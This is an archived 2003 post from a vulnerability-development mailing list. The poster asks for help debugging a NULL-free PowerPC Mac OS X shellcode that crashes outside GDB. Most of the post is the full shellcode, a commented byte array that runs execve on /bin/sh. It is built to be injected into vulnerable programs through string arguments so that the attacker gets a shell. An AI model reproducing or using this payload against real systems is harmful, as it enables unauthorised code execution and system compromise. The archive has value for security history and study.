Vulnerability Development mailing list archives

Mac OS X shellcode and SIGTRAP


From: David Riley <oscar () the-rileys net>
Date: Sat, 24 May 2003 02:15:54 -0400

I'm trying to use ghandi's OS X shellcode to get started on some development. More specifically, I'm modifying it not to use NULL chars so I can pass it through strings. I've got it working so far, except that any application I try it with straight from the shell (i.e. ./a.out `cat code`) dies with a segfault, and when I run it with GDB, I get a SIGTRAP in __dyld__dyld_start (which is where syscall 11/59 seems to branch to). If I just continue in GDB, it goes through and launches the shell like it's supposed to. What am I doing wrong? Here's the code:

char shellcode[] =
"\x7c\xa5\x2a\x78"  /* xor.   r5, r5, r5    ; r5 = NULL           */
"\x7f\xe8\x02\xa6"  /* mflr   r31                                 */
"\x38\x65\x04\xf0"  /* addi   r3, r5, 0x4f << 4                   */
"\x7c\x63\x26\x70"  /* srawi  r3, r3, 4                           */
"\x7c\xA3\xf9\xae"  /* stbx   r5, r3, r31 (terminate /bin/sh)     */
"\x38\x65\x04\x50"  /* addi   r3, r5, 0x45 << 4                   */
"\x7c\x63\x26\x70"  /* srawi  r3, r3, 4                           */
"\x7c\xA3\xfb\x2e"  /* sthx   r5, r3, r31 (fix sc)                */
"\x40\xa2\xff\xfd"  /* bnel   shellcode                           */
"\x7f\xe8\x02\xa6"  /* mflr   r31                                 */
"\x3b\xff\x01\x30"  /* addi   r31, r31, 268+36                    */
"\x38\x7f\xfe\xf4"  /* addi   r3, r31, -268 ; r3 = path           */
"\x90\x61\xff\xf8"  /* stw    r3, -8(r1)    ; argv[0] = path      */
"\x90\xa1\xff\xfc"  /* stw    r5, -4(r1)    ; argv[1] = NULL      */
"\x38\x81\xff\xf8"  /* subi   r4, r1, 8     ; r4 = {path, 0}      */
"\x3b\xc0\x76\x01"  /* li     r30, 30209                          */
"\x7f\xc0\x4e\x70"  /* srawi  r0, r30, 9                          */
"\x44\xff\xff\x02"  /* sc                   ; execve(r3, r4, r5)  */
"/bin/sh";

By the way, I copy the shellcode into a file, removing the NULL terminator from "/bin/sh" so it won't hang there (and I know this works because of the aforementioned success with GDB).

Original source of OS X (Darwin) shellcode (credit where due):
        http://www.dopesquad.net/security/shellcode/ppc/execve_binsh.h

Thanks in advance,
        David
